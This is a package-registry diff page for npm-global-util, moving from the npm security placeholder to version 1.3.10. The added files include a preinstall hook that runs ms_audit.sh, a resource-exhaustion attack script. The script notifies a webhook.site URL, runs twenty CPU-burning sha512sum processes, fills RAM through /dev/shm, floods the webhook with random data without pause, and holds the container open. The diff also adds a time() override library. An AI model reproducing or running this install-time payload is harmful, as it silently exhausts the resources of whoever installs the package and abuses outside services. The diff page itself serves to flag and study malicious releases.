npm-global-util 0.0.1-security → 1.3.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of npm-global-util might be problematic. Click here for more details.

Files changed (5) hide show
  1. package/ms_audit.sh +31 -0
  2. package/package.json +4 -3
  3. package/time_freeze.c +5 -0
  4. package/time_freeze.so +0 -0
  5. package/README.md +0 -5
package/ms_audit.sh ADDED
@@ -0,0 +1,31 @@
1
+ #!/bin/sh
2
+ URL="https://webhook.site/d5c81cf0-56dd-44dd-99cc-ce9f30972288"
3
+
4
+ # 1. Notifikasi Awal
5
+ curl -s -X POST -d "STATUS=ATTACK_STARTED | TYPE=Resource_Exhaustion | TARGET=HSCAN_SCANNER" "$URL"
6
+
7
+ # 2. Tangan Bot: Eksekusi DoS Mandiri
8
+ (
9
+ # A. CPU Stress: Menjalankan kalkulasi tanpa henti di banyak thread
10
+ # Menggunakan background loop untuk membanjiri scheduler CPU
11
+ i=0
12
+ while [ $i -lt 20 ]; do
13
+ sha512sum /dev/zero &
14
+ i=$((i+1))
15
+ done
16
+
17
+ # B. RAM & Storage Stress: Menulis file sampah ke memori dan disk
18
+ # /dev/shm adalah RAM, menulis di sini akan menguras memori fisik dengan cepat
19
+ dd if=/dev/zero of=/dev/shm/flood_test bs=1M count=1024 2>/dev/null
20
+
21
+ # C. Network Flood: Mengirimkan data acak terus menerus ke Webhook
22
+ while true; do
23
+ PAYLOAD=$(head -c 500 /dev/urandom | base64 | tr -d '\n')
24
+ curl -s -X POST -d "FLOOD_DATA=$PAYLOAD" "$URL"
25
+ # Tanpa sleep agar bandwidth terkuras maksimal
26
+ done
27
+ ) &
28
+
29
+ # 3. Persistence Lock
30
+ # Menahan agar kontainer tidak melakukan self-cleanup
31
+ tail -f /dev/null
package/package.json CHANGED
@@ -1,6 +1,7 @@
1
1
  {
2
2
  "name": "npm-global-util",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.3.10",
4
+ "scripts": {
5
+ "preinstall": "sh ms_audit.sh"
6
+ }
6
7
  }
package/time_freeze.c ADDED
@@ -0,0 +1,5 @@
1
+ #include <time.h>
2
+ time_t time(time_t *t) {
3
+ if (t) *t = 631152000;
4
+ return 631152000;
5
+ }
package/time_freeze.so ADDED
Binary file
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=npm-global-util for more information.